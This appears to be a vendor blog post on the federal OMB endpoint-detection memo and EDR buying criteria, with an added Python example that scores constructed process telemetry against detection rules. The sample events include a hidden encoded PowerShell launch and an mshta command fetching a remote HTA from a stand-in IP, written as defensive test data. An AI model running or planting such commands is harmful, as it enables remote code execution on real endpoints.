Monday, July 1, 2024

How To Improve Federal Endpoint Detection and Response Tactics and Gain Network Visibility

By Matt Marsden, Vice President, Technical Account Management, Federal, Tanium

The Office of Management and Budget (OMB) has issued a memo on endpoint detection and response (EDR). Under the memo, agencies are expected to collaborate with CISA during the development and deployment of their EDR solutions.

The memo directs the Cybersecurity and Infrastructure Security Agency (CISA) to create government-wide visibility through a centrally managed EDR initiative and to support host-level visibility, attribution, and response across federal information systems.

Within 90 days of the memo's publication, agencies must provide CISA with access to their current and future EDR tools, and CISA must provide recommendations to accelerate EDR adoption. Within 120 days, agencies must analyze their EDR solutions with CISA and identify gaps.

A recent report found that since the shift to remote work, 79% of IT teams have seen an increase in breaches at endpoints. EDR solutions are urgently needed within the federal government, especially in the era of remote work, to provide "the ability to detect and respond to increasingly sophisticated threat activity on federal networks."

What is EDR?

EDR is the ability to identify and respond to cyber threats by combining real-time, continuous monitoring and collection of endpoint data with rules-based automated response and analysis. EDR tools have gained considerable popularity among IT security operations teams because they are easy to use and because endpoints provide the richest data about intruders.

EDR enables you to:

  • Triage and investigate alerts using automated pattern detection of known malicious attack types
  • Respond automatically by configuring predetermined actions in detection rules
  • Centralize endpoint logs and telemetry data in the cloud for offline analysis

EDR techniques are useful, but they only look for certain types of activity, the "known bad." Most EDR tools also limit the activity they log to reduce bandwidth and storage. So what happens when the network experiences "unknown bad," activity that matches no existing rule or signature? This gap creates blind spots that attackers can use to get in, but complementary solutions can reduce these issues.
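To make the "known bad" versus "unknown bad" distinction concrete, here is an added example (not code from the article or from any vendor's product) that models both passes over constructed endpoint process telemetry: a rules-based EDR pass that matches known malicious patterns and attaches a predetermined response action, and a hunting pass that surfaces parent/child process lineages seen on only one host in the fleet, which no rule fires on. The hosts, events, rule names and the 198.51.100.7 address are all made up for the example.

```python
"""Rules-based EDR detection versus fleet-wide hunting over constructed endpoint telemetry."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str      # endpoint that reported the event
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # command line as recorded by the sensor


# Constructed sample telemetry for three hosts (illustrative, not captured from a real fleet).
EVENTS = [
    ProcEvent("ws01", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws02", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws03", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws02", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws03", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    # Known bad: an Office application spawning an encoded PowerShell command.
    ProcEvent("ws02", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    # "Unknown bad": no rule below covers it, but svchost spawning mshta is unique to one host.
    ProcEvent("ws03", "svchost.exe", "mshta.exe", "mshta.exe http://198.51.100.7/a.hta"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def rule_encoded_powershell(e: ProcEvent) -> bool:
    """Known-bad pattern: PowerShell launched with an encoded command."""
    return e.image.lower() == "powershell.exe" and " -enc" in e.cmdline.lower()


def rule_office_spawns_shell(e: ProcEvent) -> bool:
    """Known-bad pattern: an Office application spawning a scripting or shell interpreter."""
    return e.parent.lower() in OFFICE and e.image.lower() in SHELLS


# Each rule carries the predetermined response action the EDR would run when it fires.
RULES = [
    ("office_spawns_shell", rule_office_spawns_shell, "kill_process"),
    ("encoded_powershell", rule_encoded_powershell, "isolate_host"),
]


def detect(events, rules=RULES):
    """Rules-based EDR pass: one alert per (event, rule) match, with its response action."""
    alerts = []
    for e in events:
        for name, predicate, action in rules:
            if predicate(e):
                alerts.append({"rule": name, "host": e.host, "image": e.image, "action": action})
    return alerts


def respond(alerts):
    """Simulated automated response: the distinct (host, action) pairs the alerts would trigger."""
    return sorted({(a["host"], a["action"]) for a in alerts})


def hunt_rare_lineage(events, max_hosts=1):
    """Hunting pass: parent->child lineages seen on at most max_hosts hosts across the fleet."""
    hosts_by_pair = defaultdict(set)
    for e in events:
        hosts_by_pair[(e.parent.lower(), e.image.lower())].add(e.host)
    return sorted((pair, sorted(hosts)) for pair, hosts in hosts_by_pair.items()
                  if len(hosts) <= max_hosts)


def missed_by_rules(events, rules=RULES, max_hosts=1):
    """Rare lineages on which no rule fired: the 'unknown bad' a rules-only EDR leaves unreviewed."""
    flagged = {(a["host"], a["image"].lower()) for a in detect(events, rules)}
    return [(pair, hosts) for pair, hosts in hunt_rare_lineage(events, max_hosts)
            if not any((h, pair[1]) in flagged for h in hosts)]


if __name__ == "__main__":
    found = detect(EVENTS)
    print("rule alerts:", found)
    print("automated responses:", respond(found))
    print("rare lineages the rules did not cover:", missed_by_rules(EVENTS))
```

On this sample the rules catch the Office-to-PowerShell event on ws02 twice and would both kill the process and isolate the host, while the svchost-to-mshta lineage on ws03 matches nothing and only the fleet-wide rarity check brings it up for an analyst. The hunting pass only works because every host's lineage data is present in one place; telemetry that omits offline or unmanaged endpoints makes "seen on one host" unreliable.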

What should agencies look for in a solution?

Experienced attackers know how EDR works and how to evade it. When organizations combine threat-hunting solutions with EDR technologies, they gain deeper, more comprehensive visibility into their endpoints.

When evaluating a threat-hunting platform, agencies should keep criteria such as adaptability and scalability in mind. The platform should also be driven by accurate data and able to respond to threats in seconds. Here are some factors to look for when choosing an EDR solution:

  • Continuous monitoring of endpoints. Legacy security stacks tend to stitch incompatible point solutions together in a SIEM, producing datasets that are weeks old and that omit unmanaged, offline, or out-of-network endpoints. Instead, organizations need a comprehensive platform that collects in-depth endpoint data and returns accurate, real-time results in minutes rather than months.
  • Formatted and organized data. Many tools require you to export data from different sources, normalize the output, and then combine all of it into one report. Agencies should streamline this process with solutions that deliver actionable data already in a usable format.
  • Zero trust architecture. Strong endpoint defenses require full visibility into the entire operating environment. Agencies need a platform built on zero-trust principles that continuously monitors device health and verifies that devices are patched, secure, compliant, and managed.

Endpoint security and management platforms can dig deeper into suspicious activity detected by EDR to understand the threat and to protect additional systems that may have been compromised. A single platform of this kind collects in-depth endpoint data and gives organizations accurate, real-time answers in minutes.

The time to improve cybersecurity is now, and everyone is part of the process. The federal government has set a precedent with this memo, and agencies understand the importance of the guidance. Agencies need to implement robust EDR solutions and enhance their EDR capabilities to improve their security posture and responsiveness.

About the author

Matt Marsden is Tanium's Vice President of Federal Technical Account Management. He is a cyber expert with over 24 years of experience working in the federal government. Matt began federal service in the US Navy supporting surface submarine operations, then transitioned to civil service supporting the DoD and Intelligence Communities before joining Tanium. Matt can be contacted online at LinkedIn and on the Tanium website: https://www.tanium.com/solutions/federal-government/
